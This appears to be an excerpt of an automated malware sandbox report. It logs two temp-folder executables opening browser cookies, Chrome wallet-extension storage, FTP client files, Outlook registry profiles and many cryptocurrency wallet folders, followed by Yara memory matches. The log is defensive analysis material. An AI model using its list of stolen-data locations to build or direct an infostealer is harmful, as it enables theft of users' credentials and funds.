                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: Yara matchFile source: 0000000B.00000003.2845014489.0000000001A60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2846812600.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2809425016.0000000001A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2809635689.0000000001A60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2874285828.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2924471695.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2876379077.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 7920, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7b9f3f6834.exe PID: 2896, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
